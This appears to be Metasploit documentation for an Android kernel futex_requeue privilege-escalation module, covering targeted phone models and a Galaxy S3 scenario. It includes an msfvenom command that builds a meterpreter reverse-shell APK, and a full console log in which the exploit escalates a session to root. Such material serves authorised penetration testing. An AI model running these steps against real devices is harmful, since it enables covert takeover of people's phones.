## Vulnerable Application

This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of `futex`.
It does not trip (set off) Samsung NOX as of the time of writing.

Failed exploitation attempts may reboot the device.

## Verification Steps

  1. Start msfconsole
  2. Get a shell on a vulnerable android device
  3. Do: ```use exploit/android/local/futex_requeue```
  4. Select an appropriate target
  5. Do: ```set lhost [IP]```
  6. Do: ```run```
  7. You should get a root shell.

## Targets

  **0   Automatic Targeting**

  Attempt to automatically determine the target

  **1   Default**

  Nexus 4, 5, 7, etc

  **2   New Samsung**

  Samsung S3, S4, S5, etc

  **3   Old Samsung**

  Samsung Note 2, etc

  **4   Samsung Grand**

  Samsung Grand, etc

## Scenarios

### Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

  The following was used to generate a meterpreter Android application, and it was installed to the device.

  ```
  msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
  ```

  ```
[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999 
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue 
msf5 exploit(android/local/futex_requeue) > set session 1
session => 1
msf5 exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf5 exploit(android/local/futex_requeue) > check

[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(android/local/futex_requeue) > run

[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
  ```